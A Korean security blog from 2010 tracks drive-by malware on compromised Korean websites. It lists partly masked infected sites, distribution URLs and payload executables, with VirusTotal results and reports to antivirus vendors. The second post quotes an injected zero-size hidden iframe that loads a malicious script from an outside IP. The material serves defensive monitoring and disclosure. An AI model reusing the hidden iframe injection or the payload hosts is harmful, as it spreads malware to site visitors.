posted by Kwan's 2010. 7. 12. 12:58

1. 사이트 !!

큐x텔 : http://www.cxxxxtel.com/html

보안xx : http://www.bxxx.com

세x즌 : http://www.cxxxzen.com

한국 x xxx 협회 : http://www.x-xxxrts.or.kr

게xx임 : http://www.gaxxxxme.co.kr/main.asp

플xx 3x5 : http://fxxxx3x5.korea.com

메xx서울 : http://www.mxxxxseoul.co.kr

2. 유포지 !!

큐x텔 : http://1xx.4x.1x9.2xx/css/Lib.asp

보안xx : http://58xxx.com/js.js
            http://58xxx.com/ad.htm
            http://58xxx.com/top.jpg ~> 최종파일 다운 !!
            http://58xxx.com/cook.jpg
            http://58xxx.com/cook1.jpg
            http://58xxx.com/root.jpg

세x즌 : http://study.xxxx.or.kr/comm/hong/x.jpg
          http://study.xxxx.or.kr/comm/hong/a.jpg ~> 최종파일 다운 !!
          http://study.xxxx.or.kr/comm/hong/b.jpg
          http://study.xxxx.or.kr/comm/hong/c.jpg
          http://study.xxxx.or.kr/comm/hong/d.jpg
          http://study.xxxx.or.kr/comm/hong/i7.htm ~> 최종파일 다운 !!

한국 x xxx 협회 : http://1xx.4x.1x0.1xx/poll/k.asp

게xx임 : http://37xxx.com/0709.htm

플xx 3x5 : http://image.cixxxx.com/cixx21/xxxicle/2xxx/1231/K0000002_iel48406.html?컵켱 ~> 최종파일 다운 !!
              http://image.cixxxx.com/cixx21/xxxicle/2004/1231/K0000002_cul48407.html?耭쯩딩 ~> 최종파일 다운 !!

메xx서울 : http://ac.gexxxr.com/x/time.asp

3. 기타 사이트 !!

1. http://gft54577.xxxx.org:xx77/m/index.html ~>  http://gft54577.3xx2.org:6677/x/index.html 변조!!

2. http://cxx2.xxxx.org:88/xo/xi05.htm ~> http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK

4. 최종파일 !!

Lip.asp , k.asp :  http://61.1X0.1.XX/css/isa.exe 

top.jpg : http://58XXX.com/tt.exe 

a.jpg , i7.htm : http://www.gXXXc.or.kr/html/gg.exe

0709.htm : http://XXXc1.com/0709.exe ~> XOR 변형 필요 !!

K0000002_iel48406.html?컵켱 : http://2X2.2XX.XX.243/db/update/update.exe ~> XOR 변형 필요 !!

timp.asp : http://www.roXXX1X4.com/cXXX/hXXp/box.exe

index.html : http://XXsifyanfka700.XXXX.org:6677/m/mtv.mdb

xi05.htm : http://XXX.ses99s.cn:XX/x5.exe

5. 바이러스 토탈 결과 !!

Lip.asp , k.asp : http://www.virustotal.com/ko/analisis/1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9-1278904755

ad.htm : http://www.virustotal.com/ko/analisis/6f4fc46e4dfd66395a4409854deca6226171a11cb6aae462339cab8574dcad75-1278904740

top.jpg : http://www.virustotal.com/ko/analisis/a8e7a5591fc7214c80975a9cfd174891e7b96611d4da26fde330301417528fc8-1278905008

cook.jpg : http://www.virustotal.com/ko/analisis/4f6408d2b48a2ba706c6cbe16c8c849c3d296d199f9eaf3a851cf819912b13f0-1278904996

cook1.jpg : http://www.virustotal.com/ko/analisis/13ce3060a82619b76c430af3251d2b138eea57e84737da8f824cc365526625b3-1278904999

root.jpg : http://www.virustotal.com/ko/analisis/25e775d8df15348f9ddb19ef609dc890f1e88ed12f04731cd4d8120371d66128-1278905144

a.jpg : http://www.virustotal.com/ko/analisis/a0a69a87e30528c203f8382fbbc751426c31e22ebadf66e9b93dab94e0f0b79d-1278905114

i7.htm : http://www.virustotal.com/ko/analisis/85488952cfa5042ab6a4b6f06802dfaae9ae2632ad0c485104133211f0645629-1278905148

0709.htm : http://www.virustotal.com/ko/analisis/f339328556c643365d11206bd198f19193db8ecee8cc22d6a647bd013a4f0595-1278905215

K0000002_iel48406.html : http://www.virustotal.com/ko/analisis/daff099b6b326c61521be93fa3727057fed1b080ce088ca3e7a24cbed27ef7a4-1278905223

xi05.htm : http://www.virustotal.com/ko/analisis/ed4989eda720d6fef0536965de85aa27498773f7c3f5827f13583c64e987c868-1278905452

isa.exe : http://www.virustotal.com/ko/analisis/4a683f1f89684278d25be8ed9531400755fc057cb69b07c9fcdca82b928abb29-1278905459

tt.exe : http://www.virustotal.com/ko/analisis/d1c6030f80ad761f316b999eac1b6eff801124f37b2ba352daf97bb752e051f9-1278905516

0709.exe : http://www.virustotal.com/ko/analisis/05d8b59bc57cf452cb5d6713d254876c3f2e147e47f27aa3bef472a1a91e82f6-1278905551

update.exe : http://www.virustotal.com/ko/analisis/9bb63dbcc20b0611760e47b0d10399a05f0c91cb9cfd0d8b99c5c59040b50283-1278905560

box.exe : http://www.virustotal.com/ko/analisis/6d71ea5053c11ebdb76591175c3eeb92209bf20afbe146305ddeb806f9061a18-1278905591

mtv.mdb : http://www.virustotal.com/ko/analisis/962febb5db8cc602bd11890c47ed1ec102996d0339a440ef1e97e7d797dd098f-1278905742

x5.exe : http://www.virustotal.com/ko/analisis/6932cc1719b7c871feda078417349b39514a680dabe8409ddf59f07bac2e135c-1278905747

샘플신고 : 이스트 소프트 , 안철수연구소

[이스트 소프트]

샘플 전송 완료 , 빠른 시일내에 업데이트 !!

[안철수연구소]

1. 0709.exe ~> 분석중
2. 0709.htm ~> 분석중
3. update.exe ~> 분석중
4. tt.exe ~> 악성
5. top.jpg ~> 악성
6. root.jpg ~> 악성
7. 3964750.js ~> 악성
8. a.jpg ~> 분석중
9. ad.htm ~> 악성
10. cc.jpg ~> 분석중
11. cook.jpg ~> 악성
12. cook1.jpg ~> 악성
13. gg.exe ~> 분석중
14. i7.htm ~> 분석중
15. isa.exe ~> 분석중
16. K0000002_iel48406.html ~> 분석중
17. x5.exe ~> V3 : Packed/Upack
18. box.exe ~> V3 : Win-Trojan/Magania.55296.N(추가 : 2010.07.09.05)
19. xi05.htm ~> V3 : HTML/Agent(추가 : 2010.07.09.00)
20. mtv.mdb ~> V3 : Win-Trojan/Downloader.43388(추가 : 2010.07.08.00)
21. k.asp ~> V3 : JS/Downloader(추가 : 2010.04.23.02)
 

이번주는 약간의 모니터한 보람이 있네요. 이제는 거의 제가 모아놓은 유포지 메모장이 있으니 대부분
쉽게 찾을수 있네요 !! 아직까지 그렇게 많이 찾은것은 아니지만 !! 나중에 군대가기전에 공유를 하고 가야겠어요!검색할필요도 없고 나름 저에게는 편한거 같네요!!그래도 많이 부족하니 많은 도움을 주세요!!!이번 한주도 즐겁고 편안하게 보내세요!!!

이번주 도와 주신분 : 없음 !!

[ 이전글 ]

[security/악성코드 유포] - 보안xx 현재 악성코드 유포중 !!
[security/악성코드 유포] - 휴대폰 통신사 큐x텔 악성 스크립트 삽입 !!
[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!
[security/악성코드 유포] - TR/Bagle.trash (AntiVir) !!
[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK

댓글을 달아 주세요

  1. Kwan's 2010.07.12 17:58 신고  Addr  Edit/Del  Reply

    1 x5.exe ~> V3 : Packed/Upack
    2 update.exexx ~> V3 : Win-Trojan/Onlinegamehack.55296.I(추가 : 2010.07.12.00)
    3 0709.exexx ~> V3 : Win-Trojan/Buzus.81920.DT(추가 : 2010.07.12.00)
    4 tt.exe ~> V3 : Win-Trojan/Onlinegamehack.81920.AZ(추가 : 2010.07.12.00)
    5 top.jpg ~> V3 : JS/Exploit(추가 : 2010.07.12.00)
    6 root.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    7 K0000002_iel48406.html ~> V3 : JS/Exploit(추가 : 2010.07.12.00)
    8 isa.exe ~> V3 : Win-Trojan/Agent.55296.IE(추가 : 2010.07.12.00)
    9 gg.exe ~> V3 : Win-Trojan/Buzus.120320.Y(추가 : 2010.07.12.00)
    10 3964750.js ~> V3 : JS/Downloader(추가 : 2010.07.12.00)
    11 a.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    12 ad.htm ~> V3 : JS/Exploit(추가 : 2010.07.12.00)
    13 cook.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    14 cook1.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    15 box.exe ~> V3 : Win-Trojan/Magania.55296.N(추가 : 2010.07.09.05)
    16 xi05.htm ~> V3 : HTML/Agent(추가 : 2010.07.09.00)
    17 mtv.mdb ~> V3 : Win-Trojan/Downloader.43388(추가 : 2010.07.08.00)
    18 k.asp ~> V3 : JS/Downloader(추가 : 2010.04.23.02)
    19 cc.jpg ~> 정상
    20 i7.htm ~> 정상
    21 0709.htm ~> 정상

posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~